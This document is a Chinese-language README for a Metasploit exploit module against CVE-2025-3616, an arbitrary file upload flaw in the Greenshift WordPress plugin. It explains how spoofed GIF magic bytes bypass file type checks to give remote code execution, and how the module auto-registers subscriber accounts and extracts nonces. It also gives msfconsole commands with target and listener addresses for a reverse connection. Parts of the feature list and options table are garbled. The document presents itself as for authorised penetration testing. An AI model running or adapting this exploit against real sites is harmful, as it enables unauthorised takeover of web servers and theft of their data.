
Metasploit 模块,利用 Greenshift WordPress 插件中的任意文件上传漏洞(CVE-2025-3616),通过 MIME 欺骗实现 RCE,并具备自动注册与 nonce 提取功能。
此仓库包含一个 Metasploit 模块,用于利用 CVE-2025-3616,这是 Greenshift WordPress 插件(版本 11.4 至 11.4.5)中的一个任意文件上传漏洞。
该漏洞利用允许经过身份验证的用户(订阅者及以上)上传任意文件,从而导致远程代码执行(RCE)。它通过使用 GIF 魔法字节(GIF89a;)伪造 MIME 类型来绕过插件的文件类型验证。
USERNAME/PASSWORD)登录。REGISTER 选项,可自动注册新用户并使用新的会话 cookie 利用漏洞(如果目标启用了注册功能,则非常有用)。wp_rest nonce。finfo_file() 验证。确保您已安装 Metasploit 框架。
将 wp_greenshift_file_upload.rb 复制到您的本地模块目录:
mkdir -p ~/.msf4/modules/exploits/unix/webapp/
cp wp_greenshift_file_upload.rb ~/.msf4/modules/exploits/unix/webapp/
启动 msfconsole 并重新加载模块:
msfconsole
msf6 > reload_all
如果目标启用了用户注册,则无需凭据。
use exploit/unix/webapp/wp_greenshift_file_upload
set RHOSTS <TARGET_IP>
set LHOST <YOUR_IP>
set REGISTER true
run
如果您已有有效用户(订阅者或更高级别):
use exploit/unix/webapp/wp_greenshift_file_upload
set RHOSTS <TARGET_IP>
set LHOST <YOUR_IP>
set REGISTER false
set USERNAME <USER>
set PASSWORD <PASS>
run
| 选项 | 必需 | 描述 |
|---|---|---|
| RHOSTS | 是 | 目标地址 |
| LHOST | 是 | 监听地址(您的 IP) |
| REGISTER | 否 | 设置为 true 以自动注册新帐户(默认:false) |
| USERNAME | 否 | WordPress 用户名(如果 REGISTER 为 false 则需要) |
| PASSWORD | 否 | WordPress 密码(如果 REGISTER 为 false 则需要) |
| 否 | 用于注册的电子邮件(可选,如果为空则自动生成) |
此模块仅用于教育目的和授权渗透测试。在未事先获得双方同意的情况下使用此代码攻击目标是非法的。